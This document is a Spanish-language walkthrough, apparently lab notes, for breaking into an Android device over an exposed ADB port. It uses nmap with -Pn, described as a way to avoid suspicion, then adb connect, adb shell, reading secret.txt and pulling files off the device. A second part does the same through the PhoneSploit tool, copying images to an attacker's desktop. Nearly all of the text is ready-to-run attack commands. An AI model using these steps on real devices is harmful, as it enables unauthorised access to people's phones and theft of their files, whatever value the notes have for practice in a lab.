DISCOVER ANDORID MACHINE´S IP PORT

 

1. El puerto que utiliza Android es el 5555, con este comando nos indica que esta abierto
nmap 192.10.1.24 -Pn
nmap -Pn (red) Omita el descubrimiento de host. Cuando sabemos que la maquina esta activa. Evita sospechas en la red

 

2. Iniciamos el comando adb para establecer la conexion con su puerto
adb connect 192.10.1.24:5555
3. Iniciamos la Shell
adb shell
4. Introducimos ls para ver el contenido
ls
5. Abrimos le directorio sdcard
cd Download
6. Si nos pregunta por ver el contenido de un archivo txt, tenemos que ejecutar el comando cat por ejemplo.
cat secret.txt
7. Para copiar la carpeta a nuestro escritorio copiamos la dirrecion donde se encuentra el fichero «/sdcard/scan/» y ponemos el siguiente comando. Se descargara en la carpeta donde nos encontremos.
sudo su
adb pull /Download/imagenes/

 

EXPLOTAR LA PLATAFORMA ANDROID A TRAVÉS DE ADB USANDO PHONESPLOIT

 

1. Otra forma para hackear un Android es utilizando PhoneSploit
sudo su
cd PhoneSploit
python3 -m pip install colorama
python3 phonesploit.py
2. Conectar un nuevo teléfono.
3
3. Cuando se le solicite Introducir la dirección IP de un teléfono, escriba la dirección IP del dispositivo Android de destino
192.10.1.24

Si aparece el error Connection timed out, vuelve a escribir 3 y pulsa Intro. Si no aparece ninguna opción, escriba 3 y pulse Intro de nuevo hasta que aparezca la opción Introducir una dirección IP de teléfono.

Verás que el dispositivo Android de destino (en este caso, 192.10.1.24) está conectado a través del puerto número 5555.

 

4. Ahora, en el prompt main_menu, teclea 4 y pulsa Enter para elegir Access Shell on a phone
4
Cuando se le solicite Introducir un nombre de dispositivo, escriba la dirección IP del dispositivo Android de destino (en este caso, 192.10.1.24) y pulse Intro.

 

5. Para ver el directorio de trabajo actual en el dispositivo Android de destino.
pwd
6. Para ver todos los archivos presentes en el directorio raíz.
ls
7. Para navegar hasta la carpeta Download.
cd Download
8. Buscar un archivo desde la shell.
find  -name images.jpeg
9. Para descargar un archivo apuntamos la dirreccion donde se encuentra el archivo «/Download/images.jpeg» y nos vamos al menu principal y seleccionamos la opcion «Pull forlders from phone to pc»
9
10. Elegimos la carpeta que queremos descargar por ejemple queremos ver la images que se encuenta en /Download/images.jpeg
/Download/images.jpeg
11. Nos pide la direccion donde lo queremos guardar: Enter where you would like the file to be saved.
/home/attacker/Desktop
12. Ya podemos ver el archivo en el escritorio.
 
13. Para salir
exit